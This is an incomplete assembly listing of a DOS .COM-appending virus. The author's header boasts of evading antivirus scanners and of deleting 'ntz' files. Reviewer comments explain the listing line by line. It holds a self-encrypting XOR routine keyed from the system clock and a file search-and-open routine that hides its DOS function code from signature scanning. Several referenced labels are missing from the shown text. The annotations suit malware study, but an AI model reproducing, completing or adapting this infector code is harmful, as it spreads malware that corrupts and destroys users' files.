asm==--
;
; this program is for educational purposes only. the author takes no
; responsibility for any use or misuse of this program. (generic disclaimer)
;
; -appending *.com infector
; -random encryption using dos get time function
; -preserves original file date and time
; -three infections per run
; -nuke those pesky ntz files off the face of the earth
; -an encryption routine big enough to get 10 signatures
; -unscannable by tbav - ha ha another twist variant?
; -f-prot scans the original virus as a trivial variant
; Assembler setup: tiny model, code assembled for offset 100h. ".radix 16"
; makes every unsuffixed numeric literal in this listing hexadecimal, so
; "int 21" is int 21h and "2c" is 2Ch.
.model tiny
.radix 16
.code
org 100h
; Fixed nop bytes that the author labels "marker", wrapped around two data
; bytes.
; NOTE(review): presumably checked to recognise an already-infected file;
; that check is not in the visible listing - confirm against the full source.
; As far as the visible code shows, everything from here up to ntz_nuke lies
; before the start of the XOR range used by decr, so the markers, the key byte
; and the enc/decr routine itself are stored unencrypted in every copy.
nop ; marker
nop ; marker
nop ; marker
enc_val db 0 ; one-byte XOR key: zero in the first generation,
counter db 0 ; overwritten by enc. counter is not referenced in the visible code
nop ; (author's note: the key changes on subsequent infections)
nop ; marker
; enc / decr - single-byte XOR over the body, used for both directions.
;
; enc  : picks a new key from the DOS clock, stores it in enc_val, then falls
;        straight through into decr (there is no ret or jmp between them).
; decr : XORs byt bytes starting at ntz_nuke with enc_val, in place. XOR is
;        its own inverse, so the same loop encrypts and decrypts.
;
; In   : bp = base added to every offset. bp is not set in the visible code.
;        NOTE(review): presumably the delta offset of the appended body -
;        confirm against the full source.
; Out  : nothing returned; cx, si, di, al are overwritten (enc also changes
;        ah and the registers returned by the DOS time call).
;
; NOTE(review): movsb copies DS:SI -> ES:DI and steps by the direction flag;
; the visible code neither sets ES nor issues cld, so it assumes DS = ES and
; DF = 0 on entry - confirm.
;
; Analysis notes: the key is one byte taken from the minute field, so it can
; only take the values 0..59 (60 values, not the 59 the author states), and it
; is stored in clear in enc_val. A minute value of 0 makes the XOR a no-op and
; leaves the body unencrypted.
enc: mov ah,2c ; dos get time function (AH=2Ch)
int 21 ; returns CH=hour, CL=minute, DH=second, DL=1/100 s
mov [bp+enc_val],cl ; move the minute into the encryption
; value; author claims 59 variations (see note above)
decr: mov cx,byt ; byt is the number of bytes to xor (defined outside this listing)
lea si,[bp+offset ntz_nuke] ; point si at the start of the actual
; virus body - the first byte that gets XORed
dec_lp: lea di,[bp+offset buff] ; point di at the one-byte scratch buffer (buff is defined outside this listing)
movsb ; copy the byte at si into the buffer; si and di advance by one
mov al,[bp+offset buff] ; move the buffer into al
xor al,[bp+enc_val] ; xor al with the key byte
mov [bp+offset buff],al ; move the byte back into the buffer
lea di,[si-1] ; point di back to where the byte came from (si was already advanced by movsb)
lea si,[bp+offset buff] ; point si at the buffer
movsb ; copy the transformed byte from the buffer back into the body
mov si,di ; di now addresses the next body byte; continue from there
loop dec_lp ; loop x number of times x=byt
ret ; done with this function bail
; ntz_nuke / get_ntz - searches for a file matching ntzmask and opens it.
;
; This is the first byte of the region that decr XORs, so on disk these
; instructions appear XORed with enc_val rather than as written here.
;
; The listing stops right after the open call: the returned handle (AX) is
; not used in the visible code, and ntzmask, do_again, end_it, buff and byt
; are all defined outside it. What is done to the opened file cannot be read
; from here; the header comment only says the intent is to remove "ntz" files.
;
; In   : bp = base added to every offset (not set in the visible code).
; Uses : ax, cl, dx; calls int 21h twice.
ntz_nuke:
mov ah,4e ; find the first match (DOS AH=4Eh)
; get_ntz is a second entry point that skips the AH load above.
; NOTE(review): presumably re-entered with AH=4Fh (find next) by code not shown - confirm.
get_ntz:
lea dx,[bp+offset ntzmask] ; load the offset of the file mask into dx
int 21 ; dos call
jc do_again ; carry set = no match; continue with infection (do_again is not in this listing)
; NOTE(review): 1Eh is the file-name field offset inside a DOS DTA, so the DTA
; presumably sits at end_it; the call that sets it is not visible - confirm.
lea dx,[bp+offset end_it+1e]; load the offset fname (?)
; The next four instructions build AX = 3D02h (open file, read/write) at run
; time instead of loading it as an immediate: AH:AL = 7Ah:04h, then a one-bit
; right shift gives 3D02h.
; NOTE(review): presumably done so the 3D02h operand never appears literally
; in the code; matching on the value of AX when int 21h executes is unaffected
; by this.
mov cl, 7ah ; this loads 7a04 into ax
xchg ah, cl ; ah = 7Ah (cl receives the old ah)
mov al, 04h ; al = 04h, so ax = 7A04h
shr ax,1 ; 7A04h >> 1 = 3D02h: open the file up
int 21 ; dos does it; on success AX holds the file handle
end start
end code